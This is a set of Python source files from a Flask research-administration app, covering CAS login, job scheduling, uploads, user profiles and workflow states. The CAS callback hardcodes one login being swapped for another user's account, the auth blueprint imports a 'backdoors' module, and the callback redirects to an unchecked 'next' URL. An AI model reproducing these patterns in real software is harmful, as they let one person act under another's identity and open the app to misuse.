cmd = f"{pyenv_root}/versions/{PYTHON_VERSION}/bin/python3 -m venv env"
if run(cmd):
print("! Couldn't create virtualenv at 'env'")
sys.exit()
else:
print("Reusing existing virtual env 'env'.")
print("Installing Poetry")
cmd = "./env/bin/pip install poetry"
if run(cmd):
print("! Couldn't install Poetry")
sys.exit()
print("Installing or updating back-end (Python) dependencies")
cmd = ". env/bin/activate && poetry install"
if run(cmd):
print("! Couldn't install back-end dependencies")
sys.exit()
print("Installing or updating front-end (JavaScript) dependencies")
cmd = "yarn --cwd front"
if run(cmd):
print("! Couldn't install front-end dependencies")
sys.exit()
print()
print("Everything should be fine now.")
print()
print("Available commands are:")
print(os.popen("./env/bin/flask").read())
print()
print("Now run '. env/bin/activate' from your shell and you can start developping.")
```
#### File: jean3108/labandco/jobs.py
```python
import os
import sys
import click
from apscheduler.schedulers.blocking import BlockingScheduler
from apscheduler.triggers.cron import CronTrigger
from loguru import logger
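# coalesce=False replays each missed run individually; max_instances caps how many
# instances of the same job may run concurrently (APScheduler job defaults).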
job_defaults = {
'coalesce': False,
'max_instances': 4
}
scheduler = BlockingScheduler(job_defaults=job_defaults)
logger.remove(0)
logger.add(sys.stdout, format="{time} {level} {message}")
@click.group()
def cli():
pass
@cli.command()
def list():
scheduler.print_jobs()
@cli.command()
def run():
logger.info("Starting job scheduler")
scheduler.start()
def system(cmd: str):
logger.info(cmd)
status = os.system(cmd)
logger.info(cmd + " exited with status {}", status)
@scheduler.scheduled_job(CronTrigger(hour=1, minute=0, second=0))
def daily_reindex():
system("./bin/flask reindex")
@scheduler.scheduled_job(CronTrigger(hour=6, minute=0, second=0))
def daily_sync():
system("./bin/flask ldap-sync")
system("./bin/flask syncbi")
system("./bin/flask update-retard")
@scheduler.scheduled_job(CronTrigger(hour=0, minute=0, second=0))
def daily_recap():
system("./bin/flask send-notifications daily")
@scheduler.scheduled_job(CronTrigger(day_of_week="thu", hour=0, minute=0, second=0))
def weekly_notif():
system("./bin/flask send-notifications weekly")
@scheduler.scheduled_job(CronTrigger(day_of_week="tue", hour=0, minute=0, second=0))
def weekly_recap():
system("./bin/flask send-recap")
if __name__ == "__main__":
cli()
```
#### File: jean3108/labandco/noxfile.py
```python
import nox
@nox.session
def tests(session):
session.run("poetry", "install", external=True)
session.run("pytest")
@nox.session
def lint(session):
session.run("poetry", "install", external=True)
session.run("flake8", "labster")
session.run("mypy", "labster")
```
#### File: blueprints/auth/cas.py
```python
from __future__ import annotations
import json
from datetime import datetime
from urllib.parse import parse_qs, urlencode, urljoin, urlsplit, urlunsplit
import requests
import structlog
from flask import Flask, Request, abort, redirect, render_template, request, \
session, url_for
from flask_sqlalchemy import SQLAlchemy
from werkzeug.exceptions import Unauthorized
from labster.di import injector
from labster.domain2.model.profile import Profile
from labster.domain2.services.constants import get_constants
from labster.extensions import login_manager
from labster.security import get_current_user
from . import route
logger = structlog.get_logger()
db = injector.get(SQLAlchemy)
@login_manager.unauthorized_handler
def unauthorized(app: Flask, request: Request):
accept_header = request.headers.get("Accept", "")
if "application/json" in accept_header or app.testing:
abort(401)
return cas_login(app.config["CAS_SERVER"])
#
# Routes
#
@route("/login")
def login():
current_user = get_current_user()
if not current_user.is_authenticated:
if _single_user():
return render_template("auth/single_user.j2")
return render_template("auth/login_cas.j2")
return render_template("auth/redirect.j2")
def _single_user():
if "bypass" in request.args:
return False
constants = get_constants()
value = str(constants.get("single_user")).lower()
return value in {"none", "true", "y"}
@route("/login", methods=["POST"])
def login_post():
if "current_user_id" in session:
del session["current_user_id"]
return redirect(url_for(".login", _external=True))
@route("/go")
def go(app: Flask, request: Request):
accept_header = request.headers.get("Accept", "")
if "application/json" in accept_header or app.testing:
abort(401)
return cas_login(app.config["CAS_SERVER"])
@route("/callback")
def callback(app: Flask, request: Request):
ticket = request.args.get("ticket", "")
default_url = url_for(".login", _external=True)
next_url = request.args.get("next", default_url)
if not login_with_ticket(ticket, app.config["CAS_SERVER"]):
login_manager.unauthorized()
return redirect(next_url)
#
# Util
#
def cas_login(cas_server: str):
url = urljoin(cas_server, "login")
scheme, netloc, path, query, fragment = urlsplit(url)
args = parse_qs(query)
args["service"] = [url_for("auth.callback", _external=True)]
query = urlencode(args, doseq=True)
url = urlunsplit((scheme, netloc, path, query, fragment))
return redirect(url)
def login_with_ticket(ticket: str, cas_server: str):
url = urljoin(cas_server, "p3/serviceValidate")
service_url = url_for("auth.callback", _external=True)
params = {"service": service_url, "ticket": ticket, "format": "JSON"}
session = requests.Session()
r = session.get(url, params=params)
r.raise_for_status()
if r.status_code != 200:
logger.debug(
"Error during CAS ticket validation:\nresponse code: %d"
'\nContent: """\n%s\n"""',
r.status_code,
r.content,
)
raise ValueError(
f"Error during CAS ticket validation reponse code: {r.status_code}"
)
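    # A successful CAS 3.0 JSON response has roughly the shape
    # {"serviceResponse": {"authenticationSuccess": {"user": ..., "attributes": {...}}}};
    # failures carry an "authenticationFailure" key instead.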
service_response = r.json()["serviceResponse"]
if "authenticationSuccess" not in service_response:
# TODO: get attr "code" for details
logger.debug(r.content)
raise Unauthorized()
auth_data = service_response["authenticationSuccess"]
# Note: this is the "old" uid
login = auth_data["user"]
attributes = auth_data["attributes"]
if login == "fermigier":
login = "poulainm"
# FIXME: uid is not the "new" uid (which is attributes["uid"])
user = get_user_by_login(login)
if not user:
raise Unauthorized()
# user = Profile(uid=uid)
# user.nom = attributes["sn"]
# user.prenom = attributes["givenName"]
# # user.roles = attributes["eduPersonAffiliation"]
#
# db.session.add(user)
login_user(user)
# TODO: add these fields to Profile
user.cas_entry = json.dumps(attributes)
user.date_last_login = datetime.utcnow()
db.session.commit()
return redirect(url_for(".login", _external=True))
def get_user_by_login(login: str) -> Profile:
# This fixes some nasty "current transaction is aborted" bug
db.session.commit()
query = db.session.query(Profile).filter_by(active=True)
user = query.filter_by(login=login).first()
return user
def login_user(user):
assert user.active
session["current_user_id"] = user.id
logger.info("User has logged in", login=user.login, uid=user.uid)
```
#### File: blueprints/auth/__init__.py
```python
from __future__ import annotations
from flask import Blueprint
blueprint = Blueprint("auth", __name__, template_folder="templates", url_prefix="")
route = blueprint.route
__all__ = ()
@blueprint.record
def configure(state):
from . import backdoors, cas
```
#### File: blueprints/bi/__init__.py
```python
from __future__ import annotations
from flask import Blueprint
blueprint = Blueprint("bi", __name__, template_folder="templates", url_prefix="/bi")
route = blueprint.route
@blueprint.record
def configure(state):
from . import views
```
#### File: labster/blueprints/main.py
```python
from __future__ import annotations
import mimetypes
from datetime import datetime
import magic
from abilian.core.models.blob import Blob
from flask import Blueprint, Request, make_response, redirect, \
render_template, request
from flask_sqlalchemy import SQLAlchemy
from werkzeug.exceptions import Forbidden, NotFound
from labster.domain2.model.demande import Demande, DemandeRH
from labster.domain2.model.profile import Profile
from labster.domain2.model.structure import StructureRepository
from labster.domain2.services.constants import get_constants
from labster.domain2.services.documents_generes import devis_rh, \
lettre_commande_rh
from labster.rbac import acces_restreint, check_can_add_pj, \
check_read_access, feuille_cout_editable
from labster.rpc.commands.demandes import cleanup_model
from labster.security import get_current_profile, login_required
blueprint = Blueprint("main", __name__, url_prefix="")
route = blueprint.route
__all__ = ()
@blueprint.before_request
@login_required
def before_request():
pass
@route("/")
def home() -> str:
return render_template("v3.j2")
@route("/calculettes/feuille_cout")
def calculette_feuille_cout():
constants = get_constants()
model = {
"id": None,
"editable": True,
"constants": constants["convention"],
"couts_charges": constants["recrutement"]["couts_charges"],
}
model["constants"]["POINT_INDICE"] = constants["point_indice"]
return render_template("calculette_feuille_cout.html", model=model)
@route("/feuille_cout/<id>")
def feuille_cout(id: int, db: SQLAlchemy):
constants = get_constants()
demande = db.session.query(Demande).get(id)
check_read_access(demande)
model = demande.feuille_cout or {}
model["id"] = demande.id
model["editable"] = feuille_cout_editable(demande)
model["constants"] = constants["convention"]
model["constants"]["POINT_INDICE"] = constants["point_indice"]
model["couts_charges"] = constants["recrutement"]["couts_charges"]
return render_template("calculette_feuille_cout.html", model=model)
@route("/blob/<int:demande_id>/<int:blob_id>")
def blob(demande_id: int, blob_id: int, db: SQLAlchemy):
demande = db.session.query(Demande).get(demande_id)
blob = Blob.query.get(blob_id)
if not demande or not blob:
raise NotFound()
check_read_access(demande)
def get_filename(demande, blob_id):
for filename, v in demande.attachments.items():
if v["id"] == blob_id:
return filename
for d in demande.documents_generes:
if d["blob_id"] == blob_id:
return d["name"]
return "fichier inconnu"
filename = get_filename(demande, blob_id)
suffix = get_suffix_for(blob.value or b"")
if not suffix:
suffix = ".pdf"
if not filename.endswith(suffix):
filename = filename + suffix
response = make_response(blob.value or "")
if blob.value:
response.headers["content-type"] = magic.from_buffer(blob.value, mime=True)
else:
response.headers["content-type"] = "text/plain"
content_disposition = f'attachment;filename="{filename}"'
response.headers["content-disposition"] = content_disposition.encode()
return response
def get_suffix_for(value: bytes):
mime_type = magic.from_buffer(value, mime=True)
extension = mimetypes.guess_extension(mime_type)
return extension
@route("/upload/", methods=["POST"])
def upload(request: Request, db: SQLAlchemy):
user = get_current_profile()
form = request.form
demande_id = form["demande_id"]
demande = db.session.query(Demande).get(demande_id)
check_can_add_pj(demande)
files = request.files
for file in files.values():
file_name = file.filename
data = file.read()
blob = Blob(data)
db.session.add(blob)
db.session.flush()
demande.attachments[file_name] = {
"date": datetime.now().isoformat(),
"id": blob.id,
"creator": user.login,
}
db.session.commit()
return "OK"
@route("/demandes/<int:id>/devis_rh")
def devis_rh_rest(id, db: SQLAlchemy):
demande = db.session.query(Demande).get(id)
if acces_restreint(demande):
raise Forbidden()
assert isinstance(demande, DemandeRH)
response = make_response(devis_rh(demande))
response.headers["content-type"] = "application/pdf"
content_disposition = 'attachment;filename="devis-rh.pdf"'
response.headers["content-disposition"] = content_disposition.encode()
return response
@route("/calculettes/devis_rh", methods=["POST"])
def calculette_rh(db: SQLAlchemy, structure_repo: StructureRepository):
demande = DemandeRH()
json = request.json
model = json["model"]
form = json["form"]
user = get_current_profile()
model = cleanup_model(model, form)
demande = DemandeRH(data=model)
demande.form_state = form
porteur_dto = model.get("porteur")
if porteur_dto:
porteur_id = porteur_dto["value"]
demande.porteur = db.session.query(Profile).get(porteur_id)
if user != demande.porteur:
demande.gestionnaire = user
structure_dto = model.get("laboratoire")
if structure_dto:
structure_id = structure_dto["value"]
demande.structure = structure_repo.get_by_id(structure_id)
blob = devis_rh(demande)
response = make_response(blob)
response.headers["content-type"] = "application/pdf"
return response
@route("/demandes/<int:id>/lettre_commande_rh")
def lettre_commande_rh_rest(id, db: SQLAlchemy):
demande = db.session.query(Demande).get(id)
if acces_restreint(demande):
raise Forbidden()
assert isinstance(demande, DemandeRH)
response = make_response(lettre_commande_rh(demande))
response.headers["content-type"] = "application/pdf"
content_disposition = 'attachment;filename="lettre-commande-rh.pdf"'
response.headers["content-disposition"] = content_disposition.encode()
return response
@route("/demandes/<int:id>/fdc")
def fdc(id: int, db: SQLAlchemy):
demande = db.session.query(Demande).get(id)
# model = demande.feuille_cout
html = demande.data["fdc_html"].encode("utf8")
return html, 200, {"content-type": "text/html"}
# css = CSS(string="")
#
# s = HTML(string=html).write_pdf(stylesheets=[css])
# assert s
# return html, 200, {"content-type": "application/pdf"}
# response = make_response(s)
# response.headers["content-type"] = "application/pdf"
# return response
@route("/demandes_a_valider/<type>")
@route("/demandes_a_valider/")
def demandes_a_valider(type=None):
if type:
return redirect(f"/#/demandes_a_valider/{type}")
else:
return redirect("/#/tasks")
```
#### File: domain2/model/profile.py
```python
from __future__ import annotations
from abc import ABC
from datetime import datetime
from typing import TYPE_CHECKING, Any, Set
from uuid import uuid4
from abilian.app import db
from sqlalchemy import JSON, Boolean, Column, DateTime, Integer, String
from labster.domain2.model.base import Repository
from labster.ldap.constants import DRI_DN
if TYPE_CHECKING:
from labster.domain2.model.structure import Structure
from labster.domain2.services.roles import Role
FLUX_TENDU = 0
DAILY = 1
WEEKLY = 2
class ProfileId(str):
@staticmethod
def new() -> ProfileId:
return ProfileId(uuid4())
# @attrs(eq=False, order=False, repr=False, auto_attribs=True)
class Profile(db.Model):
__tablename__ = "v3_profiles"
id = Column(String(36), primary_key=True)
uid = Column(String(64), unique=True, nullable=True)
old_id = Column(Integer, unique=True, nullable=True)
old_uid = Column(String(64), unique=True, nullable=True)
login = Column(String(64), default="", nullable=False)
nom = Column(String, default="", nullable=False)
prenom = Column(String, default="", nullable=False)
email = Column(String, default="", nullable=False)
adresse = Column(String, default="", nullable=False)
telephone = Column(String, default="", nullable=False)
active = Column(Boolean, default=False, nullable=False)
affectation = Column(String, default="", nullable=False)
fonctions = Column(JSON, nullable=False)
preferences_notifications = Column(Integer, default=0, nullable=False)
preferences_nb_jours_notifications = Column(Integer, default=0)
date_derniere_notification_vue = Column(DateTime, default=datetime.utcnow)
def __init__(self, **kw):
self.id = str(uuid4())
self.nom = ""
self.prenom = ""
self.fonctions = []
super().__init__(**kw)
def __str__(self):
return f"<Profile {self.full_name}>"
def __repr__(self):
return str(self)
@property
def full_name(self):
return self.prenom + " " + self.nom
@property
def reversed_name(self):
return f"{self.nom}, {self.prenom}"
@property
def name(self):
return self.full_name
def activate(self):
self.active = True
def deactivate(self):
self.active = False
#
# Roles
#
def structure_d_appartenance(self) -> Structure:
from labster.di import injector
from labster.domain2.services.roles import Role, RoleService
role_service = injector.get(RoleService)
roles_dict = role_service.get_roles_for_user(self)
structures = roles_dict[Role.MEMBRE_AFFECTE]
assert len(structures) == 1
return list(structures)[0]
def has_role(self, role: Role, context: Any = None) -> bool:
from labster.di import injector
from labster.domain2.services.roles import RoleService
role_service = injector.get(RoleService)
return role_service.has_role(self, role, context)
def is_membre_dri(self):
from labster.di import injector
from labster.domain2.model.structure import StructureRepository
from labster.domain2.services.roles import Role
structure_repo = injector.get(StructureRepository)
dri = structure_repo.get_by_dn(DRI_DN)
return self.has_role(Role.MEMBRE, dri)
class ProfileRepository(Repository, ABC):
def get_all(self) -> Set[Profile]:
raise NotImplementedError
def put(self, profile: Profile):
raise NotImplementedError
def delete(self, profile: Profile):
raise NotImplementedError
def get_by_id(self, id: ProfileId) -> Profile:
raise NotImplementedError
def get_by_uid(self, uid: str) -> Profile:
raise NotImplementedError
def get_by_old_id(self, old_id: int) -> Profile:
raise NotImplementedError
def get_by_login(self, login: str) -> Profile:
raise NotImplementedError
def get_by_old_uid(self, old_uid: str) -> Profile:
raise NotImplementedError
```
#### File: services/workflow/forms.py
```python
from __future__ import annotations
def get_form(
require_note=False,
ask_for_revalidation=False,
with_no_infolab=False,
with_no_eotp=False,
):
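    # Builds a form description consumed by the front-end: a list of field dicts.
    # Example: get_form(require_note=True, with_no_eotp=True) yields a required
    # "note" textarea plus a required "no_eotp" text field.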
form = [
{"name": "note", "label": "Note", "type": "textarea", "required": require_note},
]
if ask_for_revalidation:
form.append(
{
"name": "resoumission",
"label": "Redemander validation par la hiérarchie",
"type": "bool",
"required": False,
},
)
if with_no_infolab:
form.append(
{
"name": "no_infolab",
"label": "N° Infolab / Référence",
"type": "text",
"required": True,
},
)
if with_no_eotp:
form.append(
{"name": "no_eotp", "label": "N° EOTP", "type": "text", "required": True},
)
return form
```
#### File: services/workflow/states.py
```python
from __future__ import annotations
from typing import TYPE_CHECKING, List, Set
import structlog
from labster.lib.workflow import State, Workflow
if TYPE_CHECKING:
from labster.domain2.model.profile import Profile
logger = structlog.get_logger()
class EnEdition(State):
label = "En édition"
next_action = "Edition à finaliser et à soumettre"
def on_enter(self, workflow):
case = workflow.case
case.active = True
case.editable = True
def task_owners(self, workflow):
case = workflow.case
return {u for u in [case.gestionnaire, case.porteur] if u}
class EnValidation(State):
label = "En cours de validation"
label_short = "En validation"
next_action = "Demande à considérer pour validation"
def task_owners(self, workflow: Workflow) -> Set[Profile]:
demande = workflow.case
assert demande
structures_signataires = demande.structures_signataires()
signatures = workflow.get_value("signatures") or []
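        # Task owners are the responsables of every signatory structure that has
        # not yet recorded its signature in the workflow state.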
result = set()
for structure in structures_signataires:
if structure.id not in signatures:
result.update(structure.responsables)
return result
class EnVerification(State):
label = "Recevabilité en cours de vérification"
label_short = "En vérification"
next_action = "Recevabilité à confirmer"
def on_enter(self, workflow):
workflow.set_value("ar_envoye", False)
def task_owners(self, workflow):
case = workflow.case
if case.contact_labco:
return {case.contact_labco}
else:
return set()
class EnInstruction(State):
label = "En cours d'instruction par la DR&I"
label_short = "En instruction"
next_action = "Instruction à mener et finaliser"
def task_owners(self, workflow):
case = workflow.case
if case.contact_labco:
return {case.contact_labco}
else:
return set()
# Etats finaux
class Traitee(State):
label = "Traitée par la DR&I"
label_short = "Traitée"
is_final = True
class Rejetee(State):
label = "Rejetée par la DR&I"
label_short = "Rejetée"
is_final = True
class Abandonnee(State):
label = "Abandonnée par le porteur"
label_short = "Abandonnée"
is_final = True
EN_EDITION = EnEdition()
EN_VALIDATION = EnValidation()
EN_VERIFICATION = EnVerification()
EN_INSTRUCTION = EnInstruction()
TRAITEE = Traitee()
REJETEE = Rejetee()
ABANDONNEE = Abandonnee()
ACTIVE_STATES: List[State] = [
EN_EDITION,
EN_VALIDATION,
EN_VERIFICATION,
EN_INSTRUCTION,
]
INACTIVE_STATES: List[State] = [TRAITEE, REJETEE, ABANDONNEE]
ALL_STATES: List[State] = ACTIVE_STATES + INACTIVE_STATES
```
#### File: services/workflow/workflow.py
```python
from __future__ import annotations
from labster.lib.workflow import Workflow
from .states import ALL_STATES, EN_EDITION
from .transitions import ABANDONNER, ACCUSER_RECEPTION, COMMENTER, \
CONFIRMER_FINALISATION_DGRTT, CONFIRMER_RECEVABILITE_DGRTT, DESARCHIVER, \
PRENDRE_LA_MAIN_DGRTT, PRENDRE_LA_MAIN_GESTIONNAIRE, REJETER_DGRTT, \
REQUERIR_MODIFICATION_DGRTT, REQUERIR_MODIFICATION_DIR, SOUMETTRE, \
VALIDER_DIR
class LabsterWorkflow(Workflow):
initial_state = EN_EDITION
states = ALL_STATES
# NB: order counts!
transitions = [
SOUMETTRE,
PRENDRE_LA_MAIN_GESTIONNAIRE,
VALIDER_DIR,
PRENDRE_LA_MAIN_DGRTT,
REQUERIR_MODIFICATION_DIR,
ACCUSER_RECEPTION,
CONFIRMER_RECEVABILITE_DGRTT,
CONFIRMER_FINALISATION_DGRTT,
REQUERIR_MODIFICATION_DGRTT,
REJETER_DGRTT,
ABANDONNER,
DESARCHIVER,
COMMENTER,
]
def actor_is_contact_labco(self):
return self.actor == self.case.contact_labco
def actor_is_porteur_or_gestionnaire(self):
return self.actor in (self.case.porteur, self.case.gestionnaire)
```
#### File: domain/models/profiles.py
```python
from __future__ import annotations
import json
from datetime import datetime
from typing import TYPE_CHECKING, Any, Dict, List, Optional, Set, Text, Tuple
import ramda as r
import structlog
from abilian.core.entities import Entity, EntityQuery
from flask_login import UserMixin
from sqlalchemy import Boolean, Column, DateTime, ForeignKey, Integer, \
String, Unicode, text
from sqlalchemy.orm import relationship
from labster.domain.services import dgrtt as dgrtt_service
from labster.domain.services.roles import all_roles, get_roles, has_role, \
set_role_value
from .unites import OrgUnit
from .workflow import EN_VALIDATION
if TYPE_CHECKING:
from .demandes import Demande
from .roles import Role
__all__ = ("Profile", "FLUX_TENDU", "DAILY", "WEEKLY")
logger = structlog.get_logger()
FLUX_TENDU = 0
DAILY = 1
WEEKLY = 2
class RolesMixin:
def has_role(self, role, target=None):
# type: (Any, Any) -> bool
"""Return True if profile has given role on given target."""
if isinstance(role, (list, tuple, set)):
return any(self.has_role(r, target) for r in role)
return has_role(self, role, target) # type: ignore
def all_roles(self):
return all_roles(self)
def get_roles(self, type=None):
return get_roles(self, type)
def set_role_value(self, role: str, value: bool, target=None):
return set_role_value(self, role, value, target)
def set_default_roles(self):
self.set_role_recherche()
self.set_role_dgrtt()
def set_role_recherche(self):
roles = self.ldap_dict.get("eduPersonAffiliation")
if "faculty" in roles or "researcher" in roles:
self.set_role_value("porteur", True)
def set_role_dgrtt(self):
if self.has_role("dgrtt"):
self.set_role_value("contact dgrtt", True)
else:
self.set_role_value("contact dgrtt", False)
class ChercheurMixin:
"""Méthodes spécifiques au rôle "chercheur"."""
@property
def contacts_dgrtt(self) -> List[Tuple[str, str, Profile]]:
"""Return a list of tuples: (bureau.id, bureau.nom, contact)"""
from labster.domain.models.mapping_dgrtt import MappingDgrtt
labo = self.laboratoire # type: ignore
mapping_dgrtt = MappingDgrtt.query.filter(
MappingDgrtt.ou_recherche == labo
).all()
result = []
for bureau in dgrtt_service.BUREAUX_DGRTT:
if bureau.id in ["AIPI 2", "Com", "Finance 2", "Finance 3", "Moyens"]:
continue
for m in mapping_dgrtt:
if m.bureau_dgrtt == bureau.id:
result.append((bureau.id, bureau.nom, m.contact_dgrtt))
break
return result
class DirectionRechercheMixin:
"""Méthodes spécifiques au rôle "direction de recherche"."""
@property
def stucture_dont_je_suis_le_directeur(self) -> Optional[OrgUnit]:
from labster.domain.models.roles import RoleType
roles = self.get_roles(RoleType.DIRECTION) # type: ignore
if len(roles) > 1:
uid = self.uid # type: ignore
logger.error(f"L'utilisateur {uid} a plusieurs roles de direction")
if not roles:
return None
return roles[0].context
def demandes_a_valider(self) -> List[Demande]:
demandes = self.mes_taches() # type: ignore
return [d for d in demandes if d.wf_state == EN_VALIDATION.id]
class GestionnaireMixin:
def get_membres_de_mes_structures(self) -> List[Profile]:
from .roles import RoleType
roles = self.get_roles(RoleType.GDL) # type: ignore
membres: Set[Profile] = set()
for role in roles:
org = role.context
membres.update(org.get_membres())
return r.sort_by(lambda x: x.nom, list(membres))
class RechercheMixin(ChercheurMixin, DirectionRechercheMixin):
roles: List[Role]
laboratoire: OrgUnit
@property
def structure(self) -> OrgUnit:
sous_structure = self.sous_structure
if sous_structure:
return sous_structure
else:
return self.laboratoire
@property
def sous_structure(self) -> Optional[OrgUnit]:
from .roles import RoleType
roles = self.roles
roles = [r for r in roles if r.type == RoleType.MEMBRE.value]
assert len(roles) in (0, 1)
if roles:
return roles[0].context
else:
return None
@property
def equipe(self) -> Optional[OrgUnit]:
from .unites import EQUIPE
sous_structure = self.sous_structure
if not sous_structure:
return None
if sous_structure.type == EQUIPE:
return sous_structure
parent = sous_structure.parent
if parent.type == EQUIPE:
return parent
return None
@property
def departement(self) -> Optional[OrgUnit]:
from labster.domain.models.unites import DEPARTEMENT, EQUIPE
sous_structure = self.sous_structure
if not sous_structure:
return None
if sous_structure.type == DEPARTEMENT:
return sous_structure
if sous_structure.type == EQUIPE:
parent = sous_structure.parent
if parent.type == DEPARTEMENT:
return parent
return None
class AgentDgrttMixin:
@property
def bureau_dgrtt(self):
"""Mon bureau DGRTT."""
return dgrtt_service.get_bureau_dgrtt(self)
@property
def perimetre_dgrtt(self):
"""Liste des labos auprès desquels l'agent intervient."""
return dgrtt_service.get_perimetre_dgrtt(self)
class DirectionDgrttMixin:
pass
class WorkflowActorMixin(RolesMixin):
# Silence the typechecker
laboratoire: Optional[OrgUnit]
@property
def stucture_dont_je_suis_le_directeur(self) -> Optional[OrgUnit]:
return None
@property
def perimetre_dgrtt(self) -> Set[OrgUnit]:
return set()
class ProfileQuery(EntityQuery):
def get_by_uid(self, uid: str) -> Profile:
return self.filter(Profile.uid == uid).one()
class Profile(UserMixin, AgentDgrttMixin, RechercheMixin, WorkflowActorMixin, Entity):
__tablename__ = "profile"
__indexable__ = False
query_class = ProfileQuery
#: Unique id from LDAP (ex: "jdupont"), not the same as id (surrogate key)
uid = Column(String, nullable=False, unique=True, index=True)
# TODO: add 'nullable=False'
active = Column(Boolean, default=True, server_default=text("TRUE"))
nom = Column(Unicode, nullable=False)
prenom = Column(Unicode, nullable=False)
email = Column(String, nullable=False)
adresse = Column(Unicode, default="")
telephone = Column(Unicode, default="")
laboratoire_id = Column(Integer, ForeignKey(OrgUnit.id))
laboratoire = relationship(
OrgUnit, foreign_keys=[laboratoire_id], backref="membres"
)
#: Membre de la gouvernance ?
gouvernance = Column(Boolean)
#: A vraiment les droits de la gouvernance
gouvernance_vraiment = Column(Boolean)
#: Membre de la DGRTT
dgrtt = Column(Boolean)
chef_du_bureau = Column(Unicode)
#: LDAP stuff
fonction_structurelle_principale = Column(Unicode)
#: More LDAP stuff
ldap_entry = Column(String)
#: Infos récupérées au login (CAS)
cas_entry = Column(String)
date_derniere_notification_vue = Column(
DateTime, default=datetime.utcnow, nullable=False
)
date_last_login = Column(DateTime)
#: FLUX_TENDU = 0
#: DAILY = 1
#: WEEKLY = 2
preferences_notifications = Column(Integer, default=0)
preferences_nb_jours_notifications = Column(Integer, default=0)
@property
def id(self):
return self.uid
@property
def full_name(self) -> str:
return f"{self.prenom} {self.nom}"
@property
def ldap_dict(self) -> Dict[Text, Any]:
try:
return json.loads(self.ldap_entry)
except (ValueError, TypeError):
return {}
@property
def cas_dict(self) -> Dict[Text, Any]:
try:
return json.loads(self.cas_entry)
except (ValueError, TypeError):
return {}
def __repr__(self):
return f"<Profile name={self.full_name} id={self.id}>"
def __eq__(self, other):
if not isinstance(other, Profile):
return False
return self.uid == other.uid
def __hash__(self):
return hash(self.uid)
def nb_notifications_non_vues(self) -> int:
from .notifications import Notification
return (
Notification.query.filter(Notification.user == self)
.filter(Notification.created_at > self.date_derniere_notification_vue)
.count()
)
@property
def is_directeur(self) -> bool:
"""Vrai si le profil est vraiment le directeur de la structure."""
return "{15079}" in self.fonction_structurelle_principale
```
#### File: domain/services/constants.py
```python
from __future__ import annotations
import json
from os.path import dirname
from typing import Any, Dict
import structlog
from dotted.collection import DottedCollection, DottedDict
from labster.domain.models.config import Config
from labster.extensions import db
"""
- adding new constants: add their type in TYPES and their values in
constants.json. get_constant will check for the new constants.
- upgrading the value of existing constants: use _upgrade_if_needed and the version number.
"""
logger = structlog.get_logger()
TYPES = {
"api_key": "str",
"convention.COUT_ENVIRONNEMENT_PERSONNEL_HEBERGE": "int",
"convention.COUT_HORAIRE_STAGE": "float",
"convention.DUREE_AMORTISSEMENT": "list[list[str,int]]",
"convention.REMUNERATION": "list[list[str,int]]",
"convention.TAUX_CHARGE_PATRONALE": "float",
"convention.TAUX_ENVIRONNEMENT_PERSONNEL_NON_PERMANENT": "float",
"convention.TAUX_ENVIRONNEMENT_PERSONNEL_PERMANENT": "float",
"convention.TAUX_PARTICIPATION_COUTS_INDUITS": "float",
"convention.TAUX_PROVISION_RISQUE": "float",
"faq_categories": "list[str]",
"message_dgrtt": "HTML",
"nom_bureaux_dgrtt.MSAR": "str",
"nom_bureaux_dgrtt.PIJ": "str",
"nom_bureaux_dgrtt.ETI": "str",
"nom_bureaux_dgrtt.AIPI": "str",
"nom_bureaux_dgrtt.CC": "str",
"nom_bureaux_dgrtt.CFE": "str",
"nom_bureaux_dgrtt.GF": "str",
"nom_bureaux_dgrtt.EU": "str",
"nom_bureaux_dgrtt.PI2": "str",
"nom_bureaux_dgrtt.CP": "str",
"nom_bureaux_dgrtt.REF": "str",
"nom_bureaux_dgrtt.DIR": "str",
"nom_bureaux_dgrtt.CT": "str",
"nom_bureaux_dgrtt.ETT": "str",
"point_indice": "float",
"recrutement.charges_moins_12_mois": "float",
"recrutement.charges_plus_12_mois": "float",
"recrutement.ecoles_doctorales": "list[str]",
"recrutement.grades": "list[str]",
"recrutement.salaire_brut_mensuel_indicatif.Chercheur": "str",
"recrutement.salaire_brut_mensuel_indicatif.Post-doctorant": "list[list[str,int]]",
"recrutement.salaire_brut_mensuel_indicatif.IGR": "list[list[str,int]]",
"recrutement.salaire_brut_mensuel_indicatif.IGE": "list[list[str,int]]",
"recrutement.salaire_brut_mensuel_indicatif.ASI": "list[list[str,int]]",
"recrutement.salaire_brut_mensuel_indicatif.technicien-sup": "list[list[str,int]]",
"recrutement.salaire_brut_mensuel_indicatif.technicien-normale": "list[list[str,int]]",
"recrutement.salaire_brut_mensuel_indicatif.adjoint": "list[list[str,int]]",
"recrutement.principes": "HTML",
"recrutement.provision_risque_charge_employeur": "float",
"recrutement.salaire_min_doctorant": "float",
"recrutement.couts_charges.PU/DR C EX Confirmé": "str",
"recrutement.couts_charges.PU/DR C EX": "str",
"recrutement.couts_charges.PU/DR C1 Confirmé": "str",
"recrutement.couts_charges.PU/DR C1": "str",
"recrutement.couts_charges.PU/DR C2 Confirmé": "str",
"recrutement.couts_charges.PU/DR C2": "str",
"recrutement.couts_charges.MC/CR HC Confirmé": "str",
"recrutement.couts_charges.MC/CR HC": "str",
"recrutement.couts_charges.MC/CR CN Confirmé": "str",
"recrutement.couts_charges.MC/CR CN": "str",
"recrutement.couts_charges.IR HC Confirmé": "str",
"recrutement.couts_charges.IR HC": "str",
"recrutement.couts_charges.IR C1 Confirmé": "str",
"recrutement.couts_charges.IR C1": "str",
"recrutement.couts_charges.IR C2 Confirmé": "str",
"recrutement.couts_charges.IR C2": "str",
"recrutement.couts_charges.IE HC confirmé": "str",
"recrutement.couts_charges.IE HC": "str",
"recrutement.couts_charges.IE C1 Confirmé": "str",
"recrutement.couts_charges.IE C1": "str",
"recrutement.couts_charges.IE C2 Confirmé": "str",
"recrutement.couts_charges.IE C2": "str",
"recrutement.couts_charges.ASI Confirmé": "str",
"recrutement.couts_charges.ASI": "str",
"recrutement.couts_charges.TR CE Confirmé": "str",
"recrutement.couts_charges.TR CE": "str",
"recrutement.couts_charges.TR CS Confirmé": "str",
"recrutement.couts_charges.TR CS": "str",
"recrutement.couts_charges.TR CN Confirmé": "str",
"recrutement.couts_charges.TR CN": "str",
"recrutement.transport": "float",
"demande_recrutement.pj": "HTML",
"demande_recrutement.bareme": "HTML",
"pi_invention.pieces_a_joindre": "HTML",
"pi_invention.conditions": "HTML",
"pi_logiciel.conditions": "HTML",
}
VALID_TYPES = [
"int",
"float",
"bool",
"str",
"HTML",
"list[str]",
"list[list[str,int]]",
]
for t in TYPES.values():
